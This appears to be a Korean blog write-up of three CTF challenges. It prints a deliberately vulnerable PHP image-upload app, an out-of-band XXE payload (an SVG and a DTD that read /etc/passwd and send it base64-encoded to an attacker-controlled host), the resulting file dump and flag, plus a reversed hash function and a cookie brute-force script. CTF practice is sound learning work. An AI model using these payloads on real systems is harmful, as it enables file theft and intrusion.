'2019/04/08'에 해당되는 글 3건

근래 풀어본 CTF 웹 문제중에 가장 재미있게 풀어서 오랜만에 자세하게 풀이를 남겨봤다.

먼저 문제에서 코드를 제공해 준다. 총 3개의 PHP 파일을 주는데 각  소스는 아래와 같다.

index.php

<?php

session_start();

?>

<!DOCTYPE html>

<html lang="en">

<head>

    <link type="text/css" rel="stylesheet" href="style.css" />

</head>

<body>

            <div class="container">

                <img src="static/robot.png" class="centered imgrobot" />

                <form method="post" action="upload.php" enctype="multipart/form-data">

                        <input type="file" onchange="this.form.submit()" name="image" class="btn"/>

                </form>

                <hr>

                <div class="center">

                <?php

                $base_dir = "images/" . session_id() . "/";

                foreach (glob($base_dir . "*_thumb*") as $filename) {

                    // cut off _thumb.jpg

                    $fname = substr($filename, 0, -10);

                    $large_fname = glob( $fname . "*")[0];

                    echo "<a href='$large_fname'><img src='$filename' /></a>\n";

                }

                ?>

                </div>

            </div>

</body>

</html>

gallery.php

<?php

session_start();

?>

<!DOCTYPE html>

<html lang="en">

<head>

    <link type="text/css" rel="stylesheet" href="style.css" />

</head>

<body>

<form method="post" action="upload.php" enctype="multipart/form-data">

    <div class="container">

        <h1>Your Uploaded Images:</h1>

        <?php

        $base_dir = "images/" . session_id() . "/";

        foreach (glob($base_dir . "*_thumb*") as $filename) {

            // cut off _thumb.jpg

            $fname = substr($filename, 0, -10);

            $large_fname = glob( $fname . "*")[0];

            echo "<a href='$large_fname'><img src='$filename' /></a>\n";

        }

        ?>

    </div>

    <div class="container">

        <a href="index.php">Upload More</a></span>

    </div>

</form>

</body>

</html>

upload.php

<?php

session_start();

function calcImageSize($file, $mime_type) {

    if ($mime_type == "image/png"||$mime_type == "image/jpeg") {

        $stats = getimagesize($file);  // Doesn't work for svg...

        $width = $stats[0];

        $height = $stats[1];

    } else {

        $xmlfile = file_get_contents($file);

        $dom = new DOMDocument();

        $dom->loadXML($xmlfile, LIBXML_NOENT | LIBXML_DTDLOAD);

        $svg = simplexml_import_dom($dom);

        $attrs = $svg->attributes();

        $width = (int) $attrs->width;

        $height = (int) $attrs->height;

    }

    return [$width, $height];

}

class Image {

    function __construct($tmp_name)

    {

        $allowed_formats = [

            "image/png" => "png",

            "image/jpeg" => "jpg",

            "image/svg+xml" => "svg"

        ];

        $this->tmp_name = $tmp_name;

        $this->mime_type = mime_content_type($tmp_name);

        if (!array_key_exists($this->mime_type, $allowed_formats)) {

            // I'd rather 500 with pride than 200 without security

            die("Invalid Image Format!");

        }

        $size = calcImageSize($tmp_name, $this->mime_type);

        if ($size[0] * $size[1] > 1337 * 1337) {

            die("Image too big!");

        }

        $this->extension = "." . $allowed_formats[$this->mime_type];

        $this->file_name = sha1(random_bytes(20));

        $this->folder = $file_path = "images/" . session_id() . "/";

    }

    function create_thumb() {

        $file_path = $this->folder . $this->file_name . $this->extension;

        $thumb_path = $this->folder . $this->file_name . "_thumb.jpg";

        system('convert ' . $file_path . " -resize 200x200! " . $thumb_path);

    }

    function __destruct()

    {

        if (!file_exists($this->folder)){

            mkdir($this->folder);

        }

        $file_dst = $this->folder . $this->file_name . $this->extension;

        move_uploaded_file($this->tmp_name, $file_dst);

        $this->create_thumb();

    }

}

new Image($_FILES['image']['tmp_name']);

header('Location: index.php');

위 코드 중 핵심 코드는 upload.php인데 해당 소스를 쭉 오디팅 하다보면 취약점이 터질만한 곳이 대충 3군데가 보인다.

일단 기본적인 웹쉘 업로드 같은 경우는 불가능한데 코드에서 눈에 띄는게 일단 svg업로드 시 xml parsing, 파일 convert 시 system 명령어를 사용, __destruct 매직 메서드의 존재이다.

대충 위의 포인트로 터질만하다고 보여진건 xxe, command injection, imagemagik rce, php objection injection 정도였다. 근데 각 취약점 별로 실제 트리거가 가능할지 검증이 필요했다.

먼저 가장 먼저 해볼만한게 xxe였다. 코드를 보면 별다른 필터가 없어서 Externel Entity만 활성화되어있으면 그냥 로직만 쭉 따라가면 당연히 될만한 상황이었다.

파싱 후 데이터가 뿌려지는 부분이 없어서 oob를 통해 아래와 같이 검증을 해보니 실제로 xxe가 터지는걸 확인할 수 있었다.

ssr.svg

<!DOCTYPE svg [

<!ENTITY % dtd SYSTEM "http://my_ip/test.dtd">

%dtd;

%param1;

]>

<svg>&ssr;</svg>

test.dtd

<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">

<!ENTITY % param1 "<!ENTITY ssr SYSTEM 'http://my_ip:9999/%data;'>">

/etc/passwd

root:x:0:0:root:/root:/bin/bash

daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin

bin:x:2:2:bin:/bin:/usr/sbin/nologin

sys:x:3:3:sys:/dev:/usr/sbin/nologin

sync:x:4:65534:sync:/bin:/bin/sync

games:x:5:60:games:/usr/games:/usr/sbin/nologin

man:x:6:12:man:/var/cache/man:/usr/sbin/nologin

lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin

mail:x:8:8:mail:/var/mail:/usr/sbin/nologin

news:x:9:9:news:/var/spool/news:/usr/sbin/nologin

uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin

proxy:x:13:13:proxy:/bin:/usr/sbin/nologin

www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin

backup:x:34:34:backup:/var/backups:/usr/sbin/nologin

list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin

irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin

gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin

nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin

_apt:x:100:65534::/nonexistent:/bin/false

messagebus:x:101:101::/var/run/dbus:/bin/false

Flag: midnight{R3lying_0n_PHP_4lw45_W0rKs}

Hashish

아래 함수 결과에 해당하는 결과 값을 파일로 제공해 준다.

__int64 __fastcall genhash(char *input)

{

  unsigned int v1; // eax

  char *v2; // rax

  __int64 input_byte; // rax

  char *v4; // [rsp+8h] [rbp-18h]

  unsigned int count; // [rsp+14h] [rbp-Ch]

  signed __int64 v6; // [rsp+18h] [rbp-8h]

  v4 = input;

  v6 = 13LL;

  count = 0;

  while ( 1 )

  {

    v2 = v4++;

    input_byte = (unsigned int)*v2;

    if ( !(_DWORD)input_byte )

      break;

    v6 = 3 * v6 + (signed int)input_byte;

    v1 = count++;

    printf("hash-%d : %ld\n", v1, v6);

  }

  return input_byte;

}

hash.txt

hash-0 : 138

hash-1 : 512

hash-2 : 1645

hash-3 : 5034

hash-4 : 15218

hash-5 : 45756

hash-6 : 137391

hash-7 : 412292

hash-8 : 1236927

hash-9 : 3710845

hash-10 : 11132642

hash-11 : 33398021

hash-12 : 100194167

hash-13 : 300582553

hash-14 : 901747774

hash-15 : 2705243426

hash-16 : 8115730373

hash-17 : 24347191171

hash-18 : 73041573621

hash-19 : 219124720917

hash-20 : 657374162799

hash-21 : 1972122488522

hash-22 : 5916367465576

Long road

cool[넘버] 페이지 Brute Force해주면 플래그 나오는 페이지가 있다.

In mountains I feel fresh

페이지 요청할때 마다 세션값이 다시 세팅되는데 이거 파싱해서 다음 페이지 요청할때 세션 값 재 세팅해주는 식으로 Brute Force 해주면 된다.

solve.py

import requests

def request(cookie):

    url = "http://cbmctf2019.cf:5001/"

    headers = {'Cookie': 'session=' + cookie}

    response = requests.get(url, headers=headers)

    if "cbmctf" in response.text:

        print response.text

    return response.headers['Set-Cookie'].replace("session=","").replace("; HttpOnly; Path=/","")

cookie = "eyJ2aXNpdHMiOjUwfQ.XKn_Hg.nLw94DRaPh2xkEeMUuApvcihnBo"

for i in range(0,1000):

    cookie = request(cookie)

    print cookie